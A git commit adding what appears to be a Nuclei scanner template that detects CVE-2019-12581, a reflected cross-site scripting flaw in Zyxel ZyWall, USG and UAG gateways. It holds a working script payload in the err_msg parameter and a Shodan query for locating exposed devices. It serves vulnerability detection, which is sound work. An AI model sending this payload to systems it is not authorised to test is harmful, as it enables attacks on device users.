Create CVE-2019-12581.yaml (#4502)

* Create CVE-2019-12581.yaml

* added page specific string in matcher + metadata

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
Nicolas Thumann 2022-05-29 00:54:42 +02:00 committed by GitHub
parent 0389d57ee1
commit c87d9a36ad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 43 additions and 0 deletions

View File

@ -0,0 +1,43 @@
id: CVE-2019-12581
info:
name: Zyxel ZyWall / USG / UAG - Reflected Cross-site scripting
author: n-thumann
severity: medium
description: A reflective Cross-site scripting (XSS) vulnerability in the free_time_failed.cgi CGI program in selected Zyxel ZyWall, USG, and UAG devices allows remote attackers to inject arbitrary web script or HTML via the err_msg parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-12581
- https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
- https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
- https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-12581
cwe-id: CWE-79
metadata:
shodan-query: http.title:"ZyWall"
tags: cve,cve2019,zyxel,zywall,xss
requests:
- method: GET
path:
- "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain);</script>"
- "Please contact with administrator."
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200